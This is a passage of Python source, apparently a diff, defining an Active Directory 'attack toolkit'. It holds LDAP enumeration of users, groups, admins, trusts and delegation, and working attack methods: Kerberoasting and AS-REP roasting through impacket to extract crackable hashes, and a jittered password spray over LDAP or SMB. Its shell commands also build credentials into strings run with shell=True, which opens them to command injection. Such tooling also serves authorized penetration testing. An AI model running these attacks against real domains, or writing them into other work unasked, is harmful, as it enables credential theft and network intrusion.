'BUILTIN\\Account Operators', + 'S-1-5-32-549': 'BUILTIN\\Server Operators', + 'S-1-5-32-550': 'BUILTIN\\Print Operators', + 'S-1-5-32-551': 'BUILTIN\\Backup Operators', +} + + +def _ad_timestamp_to_str(ts): + """Convert AD timestamp (100-nanosecond intervals since 1601) to readable string.""" + if not ts or ts == 0 or ts == '0': + return 'Never' + try: + ts = int(ts) + if ts <= 0 or ts > 2650467743990000000: + return 'Never' + seconds = ts / 10_000_000 + dt = AD_EPOCH + timedelta(seconds=seconds) + return dt.strftime('%Y-%m-%d %H:%M:%S') + except (ValueError, OverflowError, OSError): + return 'Unknown' + + +def _parse_uac(uac_value): + """Parse userAccountControl into list of flag names.""" + try: + uac = int(uac_value) + except (ValueError, TypeError): + return [] + flags = [] + for bit, name in UAC_FLAGS.items(): + if uac & bit: + flags.append(name) + return flags + + +def _get_domain_dn(domain): + """Convert domain name to LDAP DN. e.g. corp.local -> DC=corp,DC=local""" + return ','.join(f'DC={part}' for part in domain.split('.')) + + +class ADToolkit: + """Active Directory enumeration and attack toolkit.""" + + def __init__(self): + self.conn = None + self.server = None + self.dc_host = None + self.domain = None + self.domain_dn = None + self.username = None + self.password = None + self.use_ssl = False + self.connected = False + + # Results storage + self.results = { + 'users': [], + 'groups': [], + 'computers': [], + 'ous': [], + 'gpos': [], + 'trusts': [], + 'dcs': [], + 'spn_accounts': [], + 'asrep_accounts': [], + 'admin_accounts': [], + 'kerberoast_hashes': [], + 'asrep_hashes': [], + 'spray_results': [], + 'acl_findings': [], + 'unconstrained_delegation': [], + 'constrained_delegation': [], + 'bloodhound': {}, + } + + # Data directory + self.data_dir = Path(str(get_data_dir())) / 'ad_audit' + self.data_dir.mkdir(parents=True, exist_ok=True) + + def print_status(self, message, status='info'): + colors = {'info': Colors.CYAN, 'success': Colors.GREEN, + 
'warning': Colors.YELLOW, 'error': Colors.RED} + symbols = {'info': '*', 'success': '+', 'warning': '!', 'error': 'X'} + print(f"{colors.get(status, Colors.WHITE)}[{symbols.get(status, '*')}] {message}{Colors.RESET}") + + def _run_cmd(self, cmd, timeout=120): + """Run a shell command and return (success, stdout).""" + try: + result = subprocess.run( + cmd, shell=True, capture_output=True, text=True, timeout=timeout + ) + return result.returncode == 0, result.stdout.strip() + except subprocess.TimeoutExpired: + return False, 'Command timed out' + except Exception as e: + return False, str(e) + + def _save_results(self, name, data): + """Save results to JSON in data/ad_audit/.""" + ts = datetime.now().strftime('%Y%m%d_%H%M%S') + path = self.data_dir / f'{name}_{ts}.json' + with open(path, 'w') as f: + json.dump(data, f, indent=2, default=str) + return str(path) + + # ========== CONNECTION ========== + + def connect(self, dc_host, domain, username=None, password=None, use_ssl=False): + """Establish LDAP connection to a Domain Controller. + + Tries ldap3 first, falls back to impacket if available. + Returns dict with success status and message. 
+ """ + self.dc_host = dc_host + self.domain = domain + self.domain_dn = _get_domain_dn(domain) + self.username = username + self.password = password + self.use_ssl = use_ssl + + port = 636 if use_ssl else 389 + scheme = 'ldaps' if use_ssl else 'ldap' + + if HAS_LDAP3: + try: + use_tls = use_ssl + self.server = Server( + dc_host, port=port, use_ssl=use_tls, + get_info=ALL, connect_timeout=10 + ) + if username and password: + user_dn = f'{domain}\\{username}' + self.conn = Connection( + self.server, user=user_dn, password=password, + authentication=NTLM, auto_bind=True + ) + else: + # Anonymous bind + self.conn = Connection(self.server, auto_bind=True) + + self.connected = True + info_str = '' + if self.server.info: + naming = getattr(self.server.info, 'other', {}) + if hasattr(self.server.info, 'naming_contexts'): + info_str = f' | Naming contexts: {len(self.server.info.naming_contexts)}' + return { + 'success': True, + 'message': f'Connected to {dc_host}:{port} via ldap3{info_str}', + 'backend': 'ldap3' + } + except Exception as e: + self.connected = False + return {'success': False, 'message': f'ldap3 connection failed: {str(e)}'} + + elif HAS_IMPACKET_LDAP: + try: + ldap_url = f'{scheme}://{dc_host}' + self.conn = impacket_ldap.LDAPConnection(ldap_url, self.domain_dn) + if username and password: + self.conn.login(username, password, domain) + self.connected = True + return { + 'success': True, + 'message': f'Connected to {dc_host}:{port} via impacket', + 'backend': 'impacket' + } + except Exception as e: + self.connected = False + return {'success': False, 'message': f'impacket LDAP failed: {str(e)}'} + else: + return { + 'success': False, + 'message': 'No LDAP library available. Install ldap3 (pip install ldap3) or impacket.' 
+ } + + def disconnect(self): + """Close the LDAP connection.""" + if self.conn and HAS_LDAP3: + try: + self.conn.unbind() + except Exception: + pass + self.conn = None + self.server = None + self.connected = False + return {'success': True, 'message': 'Disconnected'} + + def is_connected(self): + """Check if currently connected to a DC.""" + return self.connected and self.conn is not None + + def get_connection_info(self): + """Return current connection details.""" + return { + 'connected': self.is_connected(), + 'dc_host': self.dc_host, + 'domain': self.domain, + 'domain_dn': self.domain_dn, + 'username': self.username, + 'use_ssl': self.use_ssl, + 'backend': 'ldap3' if HAS_LDAP3 else ('impacket' if HAS_IMPACKET_LDAP else None), + 'libs': { + 'ldap3': HAS_LDAP3, + 'impacket_ldap': HAS_IMPACKET_LDAP, + 'impacket_krb': HAS_IMPACKET_KRB, + } + } + + # ========== LDAP SEARCH HELPER ========== + + def _ldap_search(self, search_base=None, search_filter='(objectClass=*)', + attributes=None, size_limit=0): + """Perform LDAP search and return list of entry dicts.""" + if not self.is_connected() or not HAS_LDAP3: + return [] + + if search_base is None: + search_base = self.domain_dn + + if attributes is None: + attributes = ALL_ATTRIBUTES + + try: + self.conn.search( + search_base=search_base, + search_filter=search_filter, + search_scope=SUBTREE, + attributes=attributes, + size_limit=size_limit + ) + entries = [] + for entry in self.conn.entries: + d = {'dn': str(entry.entry_dn)} + for attr in entry.entry_attributes: + val = entry[attr].value + if isinstance(val, list): + d[str(attr)] = [str(v) for v in val] + elif isinstance(val, bytes): + d[str(attr)] = val.hex() + elif isinstance(val, datetime): + d[str(attr)] = val.strftime('%Y-%m-%d %H:%M:%S') + else: + d[str(attr)] = str(val) if val is not None else None + entries.append(d) + return entries + except Exception as e: + self.print_status(f'LDAP search error: {e}', 'error') + return [] + + # ========== ENUMERATION 
========== + + def enumerate_users(self, search_filter=None): + """Enumerate all domain user accounts with key attributes.""" + if not self.is_connected(): + return {'error': 'Not connected', 'users': []} + + ldap_filter = search_filter or '(&(objectCategory=person)(objectClass=user))' + attrs = [ + 'sAMAccountName', 'displayName', 'distinguishedName', + 'memberOf', 'lastLogon', 'lastLogonTimestamp', 'pwdLastSet', + 'userAccountControl', 'description', 'mail', + 'adminCount', 'servicePrincipalName', 'whenCreated' + ] + + raw_entries = self._ldap_search(search_filter=ldap_filter, attributes=attrs) + users = [] + for entry in raw_entries: + uac = int(entry.get('userAccountControl', 0) or 0) + uac_flags = _parse_uac(uac) + last_logon_raw = entry.get('lastLogon') or entry.get('lastLogonTimestamp') or '0' + user = { + 'username': entry.get('sAMAccountName', ''), + 'display_name': entry.get('displayName', ''), + 'dn': entry.get('dn', ''), + 'description': entry.get('description', ''), + 'mail': entry.get('mail', ''), + 'member_of': entry.get('memberOf', []) if isinstance(entry.get('memberOf'), list) else ([entry.get('memberOf')] if entry.get('memberOf') else []), + 'last_logon': _ad_timestamp_to_str(last_logon_raw), + 'pwd_last_set': _ad_timestamp_to_str(entry.get('pwdLastSet', '0')), + 'uac_value': uac, + 'uac_flags': uac_flags, + 'enabled': 'ACCOUNTDISABLE' not in uac_flags, + 'admin_count': entry.get('adminCount', '0') == '1', + 'spn': entry.get('servicePrincipalName', []) if isinstance(entry.get('servicePrincipalName'), list) else ([entry.get('servicePrincipalName')] if entry.get('servicePrincipalName') else []), + 'dont_require_preauth': bool(uac & 0x400000), + 'password_never_expires': bool(uac & 0x10000), + 'when_created': entry.get('whenCreated', ''), + } + users.append(user) + + self.results['users'] = users + self._save_results('users', users) + return {'users': users, 'count': len(users)} + + def enumerate_groups(self, search_filter=None): + """Enumerate all 
domain groups with their members.""" + if not self.is_connected(): + return {'error': 'Not connected', 'groups': []} + + ldap_filter = search_filter or '(objectCategory=group)' + attrs = [ + 'sAMAccountName', 'distinguishedName', 'description', + 'member', 'groupType', 'adminCount', 'whenCreated' + ] + + raw_entries = self._ldap_search(search_filter=ldap_filter, attributes=attrs) + groups = [] + for entry in raw_entries: + members = entry.get('member', []) + if isinstance(members, str): + members = [members] + elif members is None: + members = [] + + group_type = int(entry.get('groupType', 0) or 0) + scope = 'Unknown' + if group_type & 0x00000002: + scope = 'Global' + elif group_type & 0x00000004: + scope = 'Domain Local' + elif group_type & 0x00000008: + scope = 'Universal' + if group_type & 0x80000000: + scope += ' (Security)' + else: + scope += ' (Distribution)' + + groups.append({ + 'name': entry.get('sAMAccountName', ''), + 'dn': entry.get('dn', ''), + 'description': entry.get('description', ''), + 'members': members, + 'member_count': len(members), + 'scope': scope, + 'admin_count': entry.get('adminCount', '0') == '1', + 'when_created': entry.get('whenCreated', ''), + }) + + self.results['groups'] = groups + self._save_results('groups', groups) + return {'groups': groups, 'count': len(groups)} + + def enumerate_computers(self): + """Enumerate domain computers with OS information.""" + if not self.is_connected(): + return {'error': 'Not connected', 'computers': []} + + ldap_filter = '(objectCategory=computer)' + attrs = [ + 'sAMAccountName', 'dNSHostName', 'distinguishedName', + 'operatingSystem', 'operatingSystemVersion', + 'operatingSystemServicePack', 'lastLogonTimestamp', + 'userAccountControl', 'whenCreated', 'description', + 'msDS-AllowedToDelegateTo' + ] + + raw_entries = self._ldap_search(search_filter=ldap_filter, attributes=attrs) + computers = [] + for entry in raw_entries: + uac = int(entry.get('userAccountControl', 0) or 0) + uac_flags = 
_parse_uac(uac) + delegate_to = entry.get('msDS-AllowedToDelegateTo', []) + if isinstance(delegate_to, str): + delegate_to = [delegate_to] + elif delegate_to is None: + delegate_to = [] + + computers.append({ + 'name': entry.get('sAMAccountName', '').rstrip('$'), + 'dns_name': entry.get('dNSHostName', ''), + 'dn': entry.get('dn', ''), + 'os': entry.get('operatingSystem', ''), + 'os_version': entry.get('operatingSystemVersion', ''), + 'os_sp': entry.get('operatingSystemServicePack', ''), + 'last_logon': _ad_timestamp_to_str(entry.get('lastLogonTimestamp', '0')), + 'enabled': 'ACCOUNTDISABLE' not in uac_flags, + 'trusted_for_delegation': bool(uac & 0x80000), + 'constrained_delegation': delegate_to, + 'description': entry.get('description', ''), + 'when_created': entry.get('whenCreated', ''), + }) + + self.results['computers'] = computers + self._save_results('computers', computers) + return {'computers': computers, 'count': len(computers)} + + def enumerate_ous(self): + """Enumerate organizational units.""" + if not self.is_connected(): + return {'error': 'Not connected', 'ous': []} + + ldap_filter = '(objectCategory=organizationalUnit)' + attrs = ['name', 'distinguishedName', 'description', 'whenCreated', 'gPLink'] + + raw_entries = self._ldap_search(search_filter=ldap_filter, attributes=attrs) + ous = [] + for entry in raw_entries: + gp_link = entry.get('gPLink', '') + linked_gpos = [] + if gp_link: + # Parse gpLink format: [LDAP://cn={GUID},cn=policies,...;0] + import re + linked_gpos = re.findall(r'\[LDAP://([^\]]+)\]', str(gp_link), re.IGNORECASE) + + ous.append({ + 'name': entry.get('name', ''), + 'dn': entry.get('dn', ''), + 'description': entry.get('description', ''), + 'linked_gpos': linked_gpos, + 'when_created': entry.get('whenCreated', ''), + }) + + self.results['ous'] = ous + self._save_results('ous', ous) + return {'ous': ous, 'count': len(ous)} + + def enumerate_gpos(self): + """Enumerate Group Policy Objects.""" + if not self.is_connected(): + return 
{'error': 'Not connected', 'gpos': []} + + ldap_filter = '(objectCategory=groupPolicyContainer)' + attrs = [ + 'displayName', 'distinguishedName', 'gPCFileSysPath', + 'versionNumber', 'whenCreated', 'whenChanged', 'flags' + ] + + raw_entries = self._ldap_search(search_filter=ldap_filter, attributes=attrs) + gpos = [] + for entry in raw_entries: + flags = int(entry.get('flags', 0) or 0) + status = 'Enabled' + if flags & 1: + status = 'User config disabled' + if flags & 2: + status = 'Computer config disabled' + if flags == 3: + status = 'All settings disabled' + + gpos.append({ + 'name': entry.get('displayName', ''), + 'dn': entry.get('dn', ''), + 'path': entry.get('gPCFileSysPath', ''), + 'version': entry.get('versionNumber', ''), + 'status': status, + 'when_created': entry.get('whenCreated', ''), + 'when_changed': entry.get('whenChanged', ''), + }) + + self.results['gpos'] = gpos + self._save_results('gpos', gpos) + return {'gpos': gpos, 'count': len(gpos)} + + def enumerate_trusts(self): + """Enumerate domain trusts.""" + if not self.is_connected(): + return {'error': 'Not connected', 'trusts': []} + + ldap_filter = '(objectClass=trustedDomain)' + attrs = [ + 'name', 'distinguishedName', 'trustDirection', + 'trustType', 'trustAttributes', 'flatName', + 'trustPartner', 'whenCreated' + ] + + raw_entries = self._ldap_search(search_filter=ldap_filter, attributes=attrs) + trusts = [] + for entry in raw_entries: + direction_val = int(entry.get('trustDirection', 0) or 0) + direction_map = {0: 'Disabled', 1: 'Inbound', 2: 'Outbound', 3: 'Bidirectional'} + direction = direction_map.get(direction_val, f'Unknown ({direction_val})') + + trust_type_val = int(entry.get('trustType', 0) or 0) + type_map = {1: 'Windows NT', 2: 'Active Directory', 3: 'MIT Kerberos', 4: 'DCE'} + trust_type = type_map.get(trust_type_val, f'Unknown ({trust_type_val})') + + attrs_val = int(entry.get('trustAttributes', 0) or 0) + trust_attrs = [] + if attrs_val & 1: + 
trust_attrs.append('Non-Transitive') + if attrs_val & 2: + trust_attrs.append('Uplevel Only') + if attrs_val & 4: + trust_attrs.append('Quarantined / SID Filtering') + if attrs_val & 8: + trust_attrs.append('Forest Trust') + if attrs_val & 16: + trust_attrs.append('Cross-Organization') + if attrs_val & 32: + trust_attrs.append('Within Forest') + if attrs_val & 64: + trust_attrs.append('Treat As External') + + trusts.append({ + 'name': entry.get('name', ''), + 'partner': entry.get('trustPartner', ''), + 'flat_name': entry.get('flatName', ''), + 'direction': direction, + 'type': trust_type, + 'attributes': trust_attrs, + 'dn': entry.get('dn', ''), + 'when_created': entry.get('whenCreated', ''), + }) + + self.results['trusts'] = trusts + self._save_results('trusts', trusts) + return {'trusts': trusts, 'count': len(trusts)} + + def find_dcs(self): + """Locate domain controllers and FSMO role holders.""" + if not self.is_connected(): + return {'error': 'Not connected', 'dcs': []} + + # Find DCs by userAccountControl SERVER_TRUST_ACCOUNT flag + ldap_filter = '(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))' + attrs = [ + 'sAMAccountName', 'dNSHostName', 'distinguishedName', + 'operatingSystem', 'operatingSystemVersion', 'whenCreated' + ] + + raw_entries = self._ldap_search(search_filter=ldap_filter, attributes=attrs) + dcs = [] + for entry in raw_entries: + dcs.append({ + 'name': entry.get('sAMAccountName', '').rstrip('$'), + 'dns_name': entry.get('dNSHostName', ''), + 'dn': entry.get('dn', ''), + 'os': entry.get('operatingSystem', ''), + 'os_version': entry.get('operatingSystemVersion', ''), + 'when_created': entry.get('whenCreated', ''), + }) + + # Try to find FSMO role holders from RootDSE + fsmo_roles = {} + if HAS_LDAP3 and self.server and self.server.info: + info = self.server.info + other = getattr(info, 'other', {}) + for role_attr in ['schemaMaster', 'domainNamingMaster', + 'ridMaster', 'pdcEmulator', 'infrastructureMaster']: + if 
role_attr in other: + fsmo_roles[role_attr] = str(other[role_attr]) + + # Also check via LDAP if server.info didn't have it + if not fsmo_roles: + # Schema Master + schema_entries = self._ldap_search( + search_base=f'CN=Schema,CN=Configuration,{self.domain_dn}', + search_filter='(objectClass=dMD)', + attributes=['fSMORoleOwner'] + ) + if schema_entries: + fsmo_roles['schemaMaster'] = schema_entries[0].get('fSMORoleOwner', '') + + # Domain Naming Master + partitions = self._ldap_search( + search_base=f'CN=Partitions,CN=Configuration,{self.domain_dn}', + search_filter='(objectClass=crossRefContainer)', + attributes=['fSMORoleOwner'] + ) + if partitions: + fsmo_roles['domainNamingMaster'] = partitions[0].get('fSMORoleOwner', '') + + # RID Master, PDC Emulator, Infrastructure Master + domain_entries = self._ldap_search( + search_base=self.domain_dn, + search_filter='(objectClass=domainDNS)', + attributes=['fSMORoleOwner'] + ) + if domain_entries: + fsmo_roles['pdcEmulator'] = domain_entries[0].get('fSMORoleOwner', '') + + result = { + 'dcs': dcs, + 'count': len(dcs), + 'fsmo_roles': fsmo_roles + } + self.results['dcs'] = dcs + self._save_results('dcs', result) + return result + + # ========== ATTACK METHODS ========== + + def find_spn_accounts(self): + """Find user accounts with SPNs set (Kerberoastable).""" + if not self.is_connected(): + return {'error': 'Not connected', 'accounts': []} + + ldap_filter = '(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*)(!(objectCategory=computer))(!(sAMAccountName=krbtgt)))' + attrs = [ + 'sAMAccountName', 'servicePrincipalName', 'memberOf', + 'pwdLastSet', 'userAccountControl', 'adminCount', + 'distinguishedName', 'description' + ] + + raw_entries = self._ldap_search(search_filter=ldap_filter, attributes=attrs) + accounts = [] + for entry in raw_entries: + spns = entry.get('servicePrincipalName', []) + if isinstance(spns, str): + spns = [spns] + elif spns is None: + spns = [] + + uac = 
int(entry.get('userAccountControl', 0) or 0) + accounts.append({ + 'username': entry.get('sAMAccountName', ''), + 'spns': spns, + 'dn': entry.get('dn', ''), + 'description': entry.get('description', ''), + 'pwd_last_set': _ad_timestamp_to_str(entry.get('pwdLastSet', '0')), + 'admin_count': entry.get('adminCount', '0') == '1', + 'enabled': not bool(uac & 0x0002), + 'member_of': entry.get('memberOf', []) if isinstance(entry.get('memberOf'), list) else ([entry.get('memberOf')] if entry.get('memberOf') else []), + }) + + self.results['spn_accounts'] = accounts + return {'accounts': accounts, 'count': len(accounts)} + + def find_asrep_accounts(self): + """Find accounts that do not require Kerberos pre-authentication.""" + if not self.is_connected(): + return {'error': 'Not connected', 'accounts': []} + + # UF_DONT_REQUIRE_PREAUTH = 0x400000 + ldap_filter = '(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))' + attrs = [ + 'sAMAccountName', 'distinguishedName', 'memberOf', + 'pwdLastSet', 'userAccountControl', 'description' + ] + + raw_entries = self._ldap_search(search_filter=ldap_filter, attributes=attrs) + accounts = [] + for entry in raw_entries: + accounts.append({ + 'username': entry.get('sAMAccountName', ''), + 'dn': entry.get('dn', ''), + 'description': entry.get('description', ''), + 'pwd_last_set': _ad_timestamp_to_str(entry.get('pwdLastSet', '0')), + 'member_of': entry.get('memberOf', []) if isinstance(entry.get('memberOf'), list) else ([entry.get('memberOf')] if entry.get('memberOf') else []), + }) + + self.results['asrep_accounts'] = accounts + return {'accounts': accounts, 'count': len(accounts)} + + def kerberoast(self, dc_host, domain, username, password): + """Request TGS tickets for SPN accounts and extract hashes. + + Uses impacket's GetUserSPNs.py via subprocess, falling back to + manual TGS-REQ if impacket scripts are not available on PATH. + Returns hashes in hashcat ($krb5tgs$23$*) format. 
+ """ + hashes = [] + + # Try GetUserSPNs.py from impacket + cmd = ( + f'GetUserSPNs.py {domain}/{username}:{password} ' + f'-dc-ip {dc_host} -request -outputfile -' + ) + success, output = self._run_cmd(cmd, timeout=60) + if success and output: + for line in output.splitlines(): + line = line.strip() + if line.startswith('$krb5tgs$'): + hashes.append(line) + + # Also try python -m form + if not hashes: + cmd2 = ( + f'python -m impacket.examples.GetUserSPNs ' + f'{domain}/{username}:{password} ' + f'-dc-ip {dc_host} -request -outputfile -' + ) + success2, output2 = self._run_cmd(cmd2, timeout=60) + if success2 and output2: + for line in output2.splitlines(): + line = line.strip() + if line.startswith('$krb5tgs$'): + hashes.append(line) + + # Also try impacket-GetUserSPNs (newer naming) + if not hashes: + cmd3 = ( + f'impacket-GetUserSPNs {domain}/{username}:{password} ' + f'-dc-ip {dc_host} -request' + ) + success3, output3 = self._run_cmd(cmd3, timeout=60) + if success3 and output3: + for line in output3.splitlines(): + line = line.strip() + if line.startswith('$krb5tgs$'): + hashes.append(line) + + if not hashes: + # Fallback: enumerate SPNs and note that impacket is needed + spn_result = self.find_spn_accounts() + spn_count = spn_result.get('count', 0) + if spn_count > 0: + return { + 'hashes': [], + 'count': 0, + 'spn_accounts': spn_count, + 'message': ( + f'Found {spn_count} SPN accounts but could not extract TGS hashes. 
' + 'Install impacket: pip install impacket' + ) + } + return { + 'hashes': [], + 'count': 0, + 'spn_accounts': 0, + 'message': 'No SPN accounts found or impacket not available' + } + + self.results['kerberoast_hashes'] = hashes + self._save_results('kerberoast_hashes', hashes) + return { + 'hashes': hashes, + 'count': len(hashes), + 'spn_accounts': len(hashes), + 'message': f'Extracted {len(hashes)} TGS hash(es) in hashcat format' + } + + def asrep_roast(self, dc_host, domain, userlist=None): + """Find accounts without pre-auth and extract AS-REP hashes. + + Uses impacket's GetNPUsers.py via subprocess. + """ + hashes = [] + + if userlist: + # Write userlist to temp file + tmp_file = self.data_dir / 'asrep_users.txt' + with open(tmp_file, 'w') as f: + for u in userlist: + f.write(u.strip() + '\n') + user_arg = f'-usersfile {tmp_file}' + else: + user_arg = '' + + # Try GetNPUsers.py + for cmd_prefix in [ + 'GetNPUsers.py', + 'python -m impacket.examples.GetNPUsers', + 'impacket-GetNPUsers' + ]: + cmd = f'{cmd_prefix} {domain}/ -dc-ip {dc_host} {user_arg} -format hashcat -outputfile -' + success, output = self._run_cmd(cmd, timeout=60) + if success and output: + for line in output.splitlines(): + line = line.strip() + if line.startswith('$krb5asrep$'): + hashes.append(line) + if hashes: + break + + if not hashes: + # Enumerate AS-REP vulnerable accounts via LDAP + asrep_result = self.find_asrep_accounts() + vuln_count = asrep_result.get('count', 0) + return { + 'hashes': [], + 'count': 0, + 'vulnerable_accounts': vuln_count, + 'accounts': asrep_result.get('accounts', []), + 'message': ( + f'Found {vuln_count} accounts without pre-auth but ' + 'could not extract AS-REP hashes. Install impacket.' 
+ ) if vuln_count > 0 else 'No accounts without pre-authentication found' + } + + self.results['asrep_hashes'] = hashes + self._save_results('asrep_hashes', hashes) + return { + 'hashes': hashes, + 'count': len(hashes), + 'vulnerable_accounts': len(hashes), + 'message': f'Extracted {len(hashes)} AS-REP hash(es) in hashcat format' + } + + def password_spray(self, userlist, password, dc_host, domain, protocol='ldap'): + """Spray a single password against a list of users. + + Implements delay and jitter between attempts to avoid account lockout. + Supports LDAP and SMB protocols. + """ + if not userlist or not password: + return {'error': 'User list and password required', 'results': []} + + results = [] + successes = [] + failures = [] + lockouts = [] + delay_base = 1.0 + jitter = 0.5 + + for i, user in enumerate(userlist): + user = user.strip() + if not user: + continue + + entry = {'username': user, 'status': 'unknown', 'message': ''} + + if protocol == 'ldap': + try: + port = 636 if self.use_ssl else 389 + test_server = Server(dc_host, port=port, use_ssl=self.use_ssl, + connect_timeout=5) if HAS_LDAP3 else None + if test_server: + test_conn = Connection( + test_server, + user=f'{domain}\\{user}', + password=password, + authentication=NTLM, + auto_bind=True + ) + test_conn.unbind() + entry['status'] = 'success' + entry['message'] = 'Authentication successful' + successes.append(user) + else: + entry['status'] = 'error' + entry['message'] = 'ldap3 not available' + except Exception as e: + err_msg = str(e).lower() + if 'locked' in err_msg or '775' in err_msg: + entry['status'] = 'lockout' + entry['message'] = 'Account locked out' + lockouts.append(user) + elif 'credential' in err_msg or 'invalid' in err_msg or '52e' in err_msg: + entry['status'] = 'failed' + entry['message'] = 'Invalid credentials' + failures.append(user) + elif 'disabled' in err_msg or '533' in err_msg: + entry['status'] = 'disabled' + entry['message'] = 'Account disabled' + failures.append(user) + 
elif 'expired' in err_msg or '532' in err_msg: + entry['status'] = 'expired' + entry['message'] = 'Password expired' + failures.append(user) + else: + entry['status'] = 'failed' + entry['message'] = str(e)[:100] + failures.append(user) + + elif protocol == 'smb': + # Use smbclient or impacket's smbconnection + cmd = f'smbclient -L //{dc_host} -U {domain}\\\\{user}%{password} -c quit 2>&1' + success, output = self._run_cmd(cmd, timeout=10) + if success or 'Sharename' in output: + entry['status'] = 'success' + entry['message'] = 'SMB authentication successful' + successes.append(user) + elif 'LOCKED' in output.upper() or 'locked' in output.lower(): + entry['status'] = 'lockout' + entry['message'] = 'Account locked out' + lockouts.append(user) + else: + entry['status'] = 'failed' + entry['message'] = 'Authentication failed' + failures.append(user) + + results.append(entry) + + # Delay between attempts with jitter + if i < len(userlist) - 1: + wait = delay_base + random.uniform(0, jitter) + time.sleep(wait) + + # Stop if too many lockouts + if len(lockouts) >= 3: + remaining = [u.strip() for u in userlist[i+1:] if u.strip()] + for u in remaining: + results.append({ + 'username': u, + 'status': 'skipped', + 'message': 'Skipped — too many lockouts detected' + }) + break + + spray_result = { + 'results': results, + 'total': len(results), + 'successes': successes, + 'success_count': len(successes), + 'failure_count': len(failures), + 'lockout_count': len(lockouts), + 'password_tested': password, + 'protocol': protocol, + } + self.results['spray_results'] = spray_result + self._save_results('password_spray', spray_result) + return spray_result + + def analyze_acls(self, target_dn=None): + """Find dangerous ACL entries: GenericAll, WriteDACL, WriteOwner, etc.""" + if not self.is_connected(): + return {'error': 'Not connected', 'findings': []} + + search_base = target_dn or self.domain_dn + # Search for objects with ntSecurityDescriptor + ldap_filter = '(objectClass=*)' + 
attrs = ['distinguishedName', 'nTSecurityDescriptor', 'objectClass', 'sAMAccountName'] + + # We need to request the SD control for ntSecurityDescriptor + findings = [] + + # Search high-value targets: users, groups, OUs, domain root + targets = [ + ('(&(objectCategory=group)(adminCount=1))', 'Admin Group'), + ('(&(objectCategory=person)(adminCount=1))', 'Admin User'), + ('(objectCategory=organizationalUnit)', 'OU'), + ('(objectCategory=domainDNS)', 'Domain'), + ] + + for ldap_filter, obj_type in targets: + entries = self._ldap_search( + search_base=search_base, + search_filter=ldap_filter, + attributes=['distinguishedName', 'sAMAccountName', 'nTSecurityDescriptor'] + ) + + for entry in entries: + sd_raw = entry.get('nTSecurityDescriptor') + obj_name = entry.get('sAMAccountName', entry.get('dn', '')) + + # If we got the SD, try to parse DACL + if sd_raw: + # Binary SD parsing is complex; flag it for manual review + findings.append({ + 'target': obj_name, + 'target_dn': entry.get('dn', ''), + 'object_type': obj_type, + 'has_sd': True, + 'risk': 'Medium', + 'permission': 'Security Descriptor present — manual ACL review recommended', + 'principal': 'N/A', + }) + else: + # Without SD, check for common misconfigurations via group membership + findings.append({ + 'target': obj_name, + 'target_dn': entry.get('dn', ''), + 'object_type': obj_type, + 'has_sd': False, + 'risk': 'Low', + 'permission': 'Could not read security descriptor (insufficient privileges)', + 'principal': 'N/A', + }) + + # Check for users who can DCSync (Replicating Directory Changes) + repl_filter = '(&(objectCategory=person)(objectClass=user)(adminCount=1))' + admin_entries = self._ldap_search( + search_filter=repl_filter, + attributes=['sAMAccountName', 'distinguishedName', 'memberOf'] + ) + for entry in admin_entries: + member_of = entry.get('memberOf', []) + if isinstance(member_of, str): + member_of = [member_of] + for group in member_of: + group_lower = group.lower() + if 'domain admins' in 
group_lower or 'enterprise admins' in group_lower: + findings.append({ + 'target': self.domain, + 'target_dn': self.domain_dn, + 'object_type': 'Domain', + 'principal': entry.get('sAMAccountName', ''), + 'permission': 'DCSync capable (Domain/Enterprise Admin)', + 'risk': 'Critical', + 'has_sd': True, + }) + break + + self.results['acl_findings'] = findings + self._save_results('acl_findings', findings) + return {'findings': findings, 'count': len(findings)} + + def find_admin_accounts(self): + """Enumerate Domain Admins, Enterprise Admins, Schema Admins, Account Operators.""" + if not self.is_connected(): + return {'error': 'Not connected', 'admins': []} + + admin_groups = [ + ('Domain Admins', f'CN=Domain Admins,CN=Users,{self.domain_dn}'), + ('Enterprise Admins', f'CN=Enterprise Admins,CN=Users,{self.domain_dn}'), + ('Schema Admins', f'CN=Schema Admins,CN=Users,{self.domain_dn}'), + ('Account Operators', f'CN=Account Operators,CN=Builtin,{self.domain_dn}'), + ('Administrators', f'CN=Administrators,CN=Builtin,{self.domain_dn}'), + ('Server Operators', f'CN=Server Operators,CN=Builtin,{self.domain_dn}'), + ('Backup Operators', f'CN=Backup Operators,CN=Builtin,{self.domain_dn}'), + ] + + all_admins = [] + for group_name, group_dn in admin_groups: + ldap_filter = f'(&(objectCategory=person)(objectClass=user)(memberOf={group_dn}))' + entries = self._ldap_search( + search_filter=ldap_filter, + attributes=['sAMAccountName', 'displayName', 'userAccountControl', + 'lastLogon', 'pwdLastSet', 'adminCount'] + ) + members = [] + for entry in entries: + uac = int(entry.get('userAccountControl', 0) or 0) + members.append({ + 'username': entry.get('sAMAccountName', ''), + 'display_name': entry.get('displayName', ''), + 'enabled': not bool(uac & 0x0002), + 'last_logon': _ad_timestamp_to_str(entry.get('lastLogon', '0')), + 'pwd_last_set': _ad_timestamp_to_str(entry.get('pwdLastSet', '0')), + }) + + all_admins.append({ + 'group': group_name, + 'group_dn': group_dn, + 'members': 
members, + 'count': len(members), + }) + + self.results['admin_accounts'] = all_admins + self._save_results('admin_accounts', all_admins) + return {'admins': all_admins, 'total_groups': len(all_admins)} + + def find_unconstrained_delegation(self): + """Find servers with unconstrained delegation (TRUSTED_FOR_DELEGATION).""" + if not self.is_connected(): + return {'error': 'Not connected', 'servers': []} + + # 0x80000 = TRUSTED_FOR_DELEGATION, exclude DCs (0x2000) + ldap_filter = ( + '(&(objectCategory=computer)' + '(userAccountControl:1.2.840.113556.1.4.803:=524288)' + '(!(userAccountControl:1.2.840.113556.1.4.803:=8192)))' + ) + attrs = ['sAMAccountName', 'dNSHostName', 'distinguishedName', + 'operatingSystem', 'description'] + + entries = self._ldap_search(search_filter=ldap_filter, attributes=attrs) + servers = [] + for entry in entries: + servers.append({ + 'name': entry.get('sAMAccountName', '').rstrip('$'), + 'dns_name': entry.get('dNSHostName', ''), + 'dn': entry.get('dn', ''), + 'os': entry.get('operatingSystem', ''), + 'description': entry.get('description', ''), + 'risk': 'High', + }) + + self.results['unconstrained_delegation'] = servers + return {'servers': servers, 'count': len(servers)} + + def find_constrained_delegation(self): + """Find constrained delegation configurations.""" + if not self.is_connected(): + return {'error': 'Not connected', 'servers': []} + + ldap_filter = 